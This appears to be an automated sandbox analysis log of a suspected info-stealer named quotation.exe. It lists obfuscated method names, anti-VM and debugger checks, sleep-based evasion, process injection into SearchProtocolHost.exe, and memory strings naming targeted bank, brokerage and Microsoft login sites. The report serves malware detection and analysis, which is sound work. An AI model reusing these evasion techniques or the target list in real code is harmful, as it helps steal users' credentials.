                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, igLjZEwuy4ncxaKpZG.csHigh entropy of concatenated method names: 'By5O9dcHS9', 'iLXOLP1gVW', 'ToString', 'ClZOf1OUVO', 'BZkOsD7OmR', 'xXhOY4XYro', 'Br8OEsLacx', 'U1NOhdT3cq', 'FjSOGwQ8L2', 'pDWOSKDD8B'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, vaqtyES1x9bnG2cr2n.csHigh entropy of concatenated method names: 'jBrIRJgyk5', 'AyyIfj5FTU', 'WLUIssEqQF', 'qtQIY3aJGw', 'ngkIEih9l0', 'NjIIhhug6P', 'P9YIGebqcP', 'ciDISYlisX', 'XGnI6h3YuJ', 'kK9I9RBAqO'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, HbMDW0yHdZOtr5rC1qi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gPD1VG5fKD', 'XZQ1lTdLtc', 'Bqe1NH7hXe', 'z2S11Adu1K', 'G7f14FYL0m', 'G0R1qavvgM', 'OuK1MNgODM'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, nsQnYy8dO0FVqgqTup.csHigh entropy of concatenated method names: 'EDTGJibXcb', 'WqgGdiFdGY', 'LkfGoltwd7', 'QqyGQ7YtVT', 'MN5GZiModv', 'LiBG2ADYb4', 'iKvGctBrTx', 'eMYG74rpfv', 'oe3Gn94SX5', 'ntAGpPl64r'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, AXHIhE0rrbcxCnaSwa.csHigh entropy of concatenated method names: 'AmdhRDPZpS', 'o1JhstP8Sm', 'CfOhEo1f5I', 'JFOhGobND8', 'r5dhS32mCc', 'tOvExWhlIc', 'aXLEaV5K15', 'BnLE3CAVwQ', 'eXOEPcQmgV', 'wv4EC6FqVG'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, uxQMiJaExfnfdS5k0A.csHigh entropy of concatenated method names: 'ADZOP4Bbto', 'JUSODHDc7B', 'zsLtrOdOtG', 'xvltyJ5ZrC', 'pieOkFISv1', 'LqTObq7sA2', 'zXUOBFa4RH', 'UgsO5sZea5', 'fKKOT1MjB4', 'y7uOFWdU9h'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, PhE7cd7e532AwGMfh6.csHigh entropy of concatenated method names: 'J9Zs5lvcdp', 'nSlsTFpyMM', 'i8hsFCwHlV', 'Ym0swvsNWE', 'xJEsxKVJl2', 'zRgsaYwufk', 'rses3jJ6Xu', 'HQHsPQ3PgR', 'a1PsCIaCiW', 'hXVsDL1rAC'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, vlWaM4C0ajeeFEGTEg.csHigh entropy of concatenated method names: 'bFxV0AQuDU', 'Q1rVunxaFs', 'GXHVmfrpY2', 'revVW8vEuu', 'YMxVAWuXM2', 'kSoVve0PN8', 'd1LVKJTe9Z', 'V0yVUSu2ul', 'g5gV8QNNmB', 'vvWVXBxqjo'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, XBl1RTsAAfAQTYAK48.csHigh entropy of concatenated method names: 'Dispose', 'KTDyCEuN3u', 'RaTeuwx9wT', 'TaZe0Rwpa8', 'l8xyDgQqrx', 'qFxyzyO4Yc', 'ProcessDialogKey', 'n44erlWaM4', 'GajeyeeFEG', 'REgee3HUr1'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, pj3NRjnY9uvN4UEA5l.csHigh entropy of concatenated method names: 'iuMYQimpL2', 'CGhY2ZiWFF', 'zpkY7tYv53', 'BaZYnWHxwG', 'b34YjOjCsn', 'bH1YidHkYY', 'KHwYObcbjS', 'y7KYteiPDH', 'qv4YVafHZw', 'wVCYlLH3Mg'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, zuXSPG36xvTDEuN3u9.csHigh entropy of concatenated method names: 'XEHVjkR7Rc', 'FcVVOUHC1j', 'khRVVmjrZG', 'aSLVNLbeCU', 'pMhV4nuToL', 'GYhVMSCp5T', 'Dispose', 'IXdtftYN0e', 'LeLtsDaZXY', 'XOftYVYDSl'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, AV5lmgHwybY1fD7Qff.csHigh entropy of concatenated method names: 'A8ByGhE7cd', 'b53yS2AwGM', 'oY9y9uvN4U', 'hA5yLlJXC9', 'GLjyjpGQXH', 'chEyirrbcx', 'FppNjHZWJVEH1lvmUM', 'njbHOZnk7V41CY0mQL', 'jhbHcaHtrXFeSH0xfr', 'rxNyyXtBAd'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, pLPQt4Bn5xe9eGEnMM.csHigh entropy of concatenated method names: 'L5Tg7mPM3Y', 'cHYgn1goK3', 'vYYg0y8Mdt', 'ErBguuwW1T', 'exXgW4njyO', 'YKLgAtFJcT', 'LdKgK9EiZF', 'KMNgUoT44Y', 'gBEgXruiWT', 'Gmygk7j37b'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, hvjmokKZ8lLbKLChpk.csHigh entropy of concatenated method names: 'W5MGf0rSEK', 'ogUGY3UK9G', 'A9XGhfn4MN', 'ne6hD4p4Bm', 'f4XhzhvLu0', 'eR3GryqJEZ', 'rInGyiNQiQ', 'KRnGenZZ0D', 'JUpGIe82kg', 'eWuGHKnCFd'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, f5eyUHyyHuPqjuGZm6k.csHigh entropy of concatenated method names: 'm5LlDiO1kl', 'keFlzP2FqI', 'GNDNr8s51a', 'TRmNyo6v2L', 'df8NekPfgu', 'v6INIvTfLG', 'NZjNHANO9n', 'FQZNRx05ho', 'vs2NfjY0Pg', 'ulaNs9TepV'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, pZk3pLyIopLDLWvc0Hn.csHigh entropy of concatenated method names: 'bwvNDQ5MAt', 'XVxNzqcQvL', 'JgV1rIIjf9', 'og3Ctj8MTiDvUmpde5c', 'GRQuXB8ImeoITCrN6a4', 'Soq22v8kg9IIAysMCKd', 'qtPdWK8QGh4mwmHa1Um'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, LVKrllyrPiAikE2cPtv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ne6lkgOZrO', 'v8DlbYfTBN', 'UnnlBpjkHy', 'bJPl5gb736', 'zkQlTtnVih', 'cwXlF3g0Aj', 'nyslwIm1K7'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, Dfi3HJz6ikG3sKKhh1.csHigh entropy of concatenated method names: 'thPl23mftU', 'Odkl7icTOI', 'jHrlnTiryn', 'O1ml061qGu', 'tgtluK9EdV', 'zNWlWjJasN', 'CLklAk25Bh', 'QWSlMQo8sa', 'nQnlJZR8VO', 'RPEldew2Up'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, kFdrDa5ana4OP3ed6e.csHigh entropy of concatenated method names: 'U77jXhXNvi', 'v6vjbukldE', 'NEbj5W83Zm', 'q9FjTWVvlM', 'eEbju8iqG2', 'nbLjmmNihY', 'SN3jWYpF6w', 'oZJjAKVXcD', 'GoBjvpmJA5', 'PJGjKjm1V8'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, FQvWyceLfRPdjLfgif.csHigh entropy of concatenated method names: 'j9woIMtDY', 'z1vQIqLmb', 'V7B21sqEr', 'KaSc1Yawp', 'VZVn7Tvje', 'DMwp5bsXE', 'uhAx7oq7nLCrx1AP8V', 'uV3GsDddG4ivsL5Ykr', 'NbjtW1q9Z', 'VJAlxxgKg'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, WHUr1BDNicOTIAbIO1.csHigh entropy of concatenated method names: 'iFSlYbOnP5', 'v9JlEsLwNc', 'kBalhyKlYU', 'perlGirtQt', 'bRhlVuwRV5', 'GuUlSGdgKO', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, igLjZEwuy4ncxaKpZG.csHigh entropy of concatenated method names: 'By5O9dcHS9', 'iLXOLP1gVW', 'ToString', 'ClZOf1OUVO', 'BZkOsD7OmR', 'xXhOY4XYro', 'Br8OEsLacx', 'U1NOhdT3cq', 'FjSOGwQ8L2', 'pDWOSKDD8B'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, vaqtyES1x9bnG2cr2n.csHigh entropy of concatenated method names: 'jBrIRJgyk5', 'AyyIfj5FTU', 'WLUIssEqQF', 'qtQIY3aJGw', 'ngkIEih9l0', 'NjIIhhug6P', 'P9YIGebqcP', 'ciDISYlisX', 'XGnI6h3YuJ', 'kK9I9RBAqO'
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, HbMDW0yHdZOtr5rC1qi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gPD1VG5fKD', 'XZQ1lTdLtc', 'Bqe1NH7hXe', 'z2S11Adu1K', 'G7f14FYL0m', 'G0R1qavvgM', 'OuK1MNgODM'
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: quotation.exe PID: 2364, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\quotation.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeMemory allocated: 4D30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeMemory allocated: 53E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeMemory allocated: 63E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeMemory allocated: 6510000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeMemory allocated: 7510000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeMemory allocated: A1D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeMemory allocated: B1D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeMemory allocated: B660000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeMemory allocated: C660000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F096E rdtsc 3_2_012F096E
                Source: C:\Users\user\Desktop\quotation.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeWindow / User API: threadDelayed 2823Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeWindow / User API: threadDelayed 7148Jump to behavior
                Source: C:\Users\user\Desktop\quotation.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\quotation.exe TID: 3184Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 6548Thread sleep count: 2823 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 6548Thread sleep time: -5646000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 6548Thread sleep count: 7148 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 6548Thread sleep time: -14296000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe TID: 3136Thread sleep time: -65000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe TID: 3136Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe TID: 3136Thread sleep time: -54000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe TID: 3136Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe TID: 3136Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A2C860 FindFirstFileW,FindNextFileW,FindClose,6_2_02A2C860
                Source: C:\Users\user\Desktop\quotation.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: sE716IK71M.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: sE716IK71M.6.drBinary or memory string: discord.comVMware20,11696428655f
                Source: sE716IK71M.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: firefox.exe, 00000009.00000002.2678320779.0000018C8B3BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTTG
                Source: sE716IK71M.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: sE716IK71M.6.drBinary or memory string: global block list test formVMware20,11696428655
                Source: sE716IK71M.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: gkTgnrvdOG.exe, 00000007.00000002.4519879699.000000000067F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                Source: sE716IK71M.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: sE716IK71M.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: sE716IK71M.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: sE716IK71M.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: sE716IK71M.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: sE716IK71M.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: sE716IK71M.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: sE716IK71M.6.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: sE716IK71M.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: sE716IK71M.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: sE716IK71M.6.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: sE716IK71M.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: sE716IK71M.6.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: sE716IK71M.6.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: sE716IK71M.6.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: sE716IK71M.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: sE716IK71M.6.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: sE716IK71M.6.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: sE716IK71M.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: sE716IK71M.6.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: sE716IK71M.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: sE716IK71M.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK&m'h
                Source: sE716IK71M.6.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: sE716IK71M.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: sE716IK71M.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\quotation.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F096E rdtsc 3_2_012F096E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00417C23 LdrLoadDll,3_2_00417C23
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E0124 mov eax, dword ptr fs:[00000030h]3_2_012E0124
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01370115 mov eax, dword ptr fs:[00000030h]3_2_01370115
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135A118 mov ecx, dword ptr fs:[00000030h]3_2_0135A118
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135A118 mov eax, dword ptr fs:[00000030h]3_2_0135A118
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135A118 mov eax, dword ptr fs:[00000030h]3_2_0135A118
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135A118 mov eax, dword ptr fs:[00000030h]3_2_0135A118
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E10E mov eax, dword ptr fs:[00000030h]3_2_0135E10E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E10E mov ecx, dword ptr fs:[00000030h]3_2_0135E10E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E10E mov eax, dword ptr fs:[00000030h]3_2_0135E10E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E10E mov eax, dword ptr fs:[00000030h]3_2_0135E10E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E10E mov ecx, dword ptr fs:[00000030h]3_2_0135E10E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E10E mov eax, dword ptr fs:[00000030h]3_2_0135E10E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E10E mov eax, dword ptr fs:[00000030h]3_2_0135E10E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E10E mov ecx, dword ptr fs:[00000030h]3_2_0135E10E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E10E mov eax, dword ptr fs:[00000030h]3_2_0135E10E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E10E mov ecx, dword ptr fs:[00000030h]3_2_0135E10E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384164 mov eax, dword ptr fs:[00000030h]3_2_01384164
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384164 mov eax, dword ptr fs:[00000030h]3_2_01384164
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01348158 mov eax, dword ptr fs:[00000030h]3_2_01348158
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01344144 mov eax, dword ptr fs:[00000030h]3_2_01344144
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01344144 mov eax, dword ptr fs:[00000030h]3_2_01344144
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01344144 mov ecx, dword ptr fs:[00000030h]3_2_01344144
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01344144 mov eax, dword ptr fs:[00000030h]3_2_01344144
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01344144 mov eax, dword ptr fs:[00000030h]3_2_01344144
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AC156 mov eax, dword ptr fs:[00000030h]3_2_012AC156
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B6154 mov eax, dword ptr fs:[00000030h]3_2_012B6154
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B6154 mov eax, dword ptr fs:[00000030h]3_2_012B6154
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F0185 mov eax, dword ptr fs:[00000030h]3_2_012F0185
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133019F mov eax, dword ptr fs:[00000030h]3_2_0133019F
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133019F mov eax, dword ptr fs:[00000030h]3_2_0133019F
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133019F mov eax, dword ptr fs:[00000030h]3_2_0133019F
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133019F mov eax, dword ptr fs:[00000030h]3_2_0133019F
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01354180 mov eax, dword ptr fs:[00000030h]3_2_01354180
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01354180 mov eax, dword ptr fs:[00000030h]3_2_01354180
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AA197 mov eax, dword ptr fs:[00000030h]3_2_012AA197
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AA197 mov eax, dword ptr fs:[00000030h]3_2_012AA197
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AA197 mov eax, dword ptr fs:[00000030h]3_2_012AA197
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136C188 mov eax, dword ptr fs:[00000030h]3_2_0136C188
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136C188 mov eax, dword ptr fs:[00000030h]3_2_0136C188
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E01F8 mov eax, dword ptr fs:[00000030h]3_2_012E01F8
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013861E5 mov eax, dword ptr fs:[00000030h]3_2_013861E5
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132E1D0 mov eax, dword ptr fs:[00000030h]3_2_0132E1D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132E1D0 mov eax, dword ptr fs:[00000030h]3_2_0132E1D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0132E1D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132E1D0 mov eax, dword ptr fs:[00000030h]3_2_0132E1D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132E1D0 mov eax, dword ptr fs:[00000030h]3_2_0132E1D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013761C3 mov eax, dword ptr fs:[00000030h]3_2_013761C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013761C3 mov eax, dword ptr fs:[00000030h]3_2_013761C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01346030 mov eax, dword ptr fs:[00000030h]3_2_01346030
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AA020 mov eax, dword ptr fs:[00000030h]3_2_012AA020
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AC020 mov eax, dword ptr fs:[00000030h]3_2_012AC020
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01334000 mov ecx, dword ptr fs:[00000030h]3_2_01334000
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01352000 mov eax, dword ptr fs:[00000030h]3_2_01352000
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01352000 mov eax, dword ptr fs:[00000030h]3_2_01352000
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01352000 mov eax, dword ptr fs:[00000030h]3_2_01352000
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01352000 mov eax, dword ptr fs:[00000030h]3_2_01352000
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01352000 mov eax, dword ptr fs:[00000030h]3_2_01352000
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01352000 mov eax, dword ptr fs:[00000030h]3_2_01352000
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01352000 mov eax, dword ptr fs:[00000030h]3_2_01352000
